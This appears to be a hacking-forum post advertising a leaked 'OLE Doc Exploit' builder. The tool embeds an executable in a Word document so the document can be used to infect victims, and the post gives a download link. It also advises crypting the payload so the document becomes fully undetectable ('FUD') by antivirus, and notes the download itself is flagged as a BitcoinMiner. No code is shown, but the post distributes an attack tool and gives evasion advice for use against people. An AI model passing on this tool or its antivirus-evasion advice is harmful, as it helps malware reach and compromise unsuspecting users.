“Hackers are using booby-trapped Word documents to deliver malware to unsuspecting victims. The malware exploits Windows Object Linking and Embedding (OLE) features, which allow users to link to documents and other objects – in this case, a malicious remote server.”
Source: https://www.vadesecure.com/en/word-doc-malware/
This tool was created by the AutoLog team and has been since leaked. Here is the latest version of their OLE Doc Exploit.
This embeds the executable into the document making it so that the document will scan and show the same virus scan as your executable. If you have a good crypt, if it's scan is fud then so will be your document.
Virus Total: https://www.virustotal.com/#/file/3aa395f65a4c7d67d4821d478328808409fa8bf0db5448787663c296fc85652e/detection
Download: https://www.0dayexploits.net/product/ole-doc-exploit/
NOTE: I DID NOT CREATE THIS. The virus total shows 22/67 and indicates "BitcoinMiner" etc... ALWAYS RUN THIS IN SANDBOXIE